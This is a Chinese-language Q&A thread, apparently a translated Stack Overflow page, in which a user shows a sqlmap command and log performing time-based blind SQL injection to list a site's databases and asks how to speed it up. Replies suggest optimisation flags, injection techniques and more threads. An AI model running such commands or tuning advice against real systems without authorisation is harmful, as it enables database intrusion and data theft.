4

这是一个例子。只是试图列出数据库:

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

您可以在时间戳中看到列出 1 个数据库名称大约需要 3 分钟,它一个字符一个字符地进行,每个字符大约需要 7 秒。我在 youtube 上看到的教程非常快……我能做些什么来加快速度?我试过弄乱 .conf

谢谢。

4

4 回答 4

2

您还可以使用 -o 开关进行一些优化。也试试 --technique=BEUS

于 2013-01-12T07:48:24.077 回答
1

somesite.com 的网络延迟是多少?您可以通过简单地执行 ping somesite.com 来检查这一点。如果延迟很高,那么在逐个字符测试时,执行盲注 SQL 会很慢。– rgerganov 7 月 4 日 19:43

于 2012-07-18T20:38:16.300 回答
1

使用更多线程。默认值为 1:

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)
于 2016-09-21T08:49:34.590 回答
-1

您可以像这样使用快速响应。sqlmap -u " http://somesite.com/?id=1 " --time-sec 15

于 2017-07-11T18:39:37.523 回答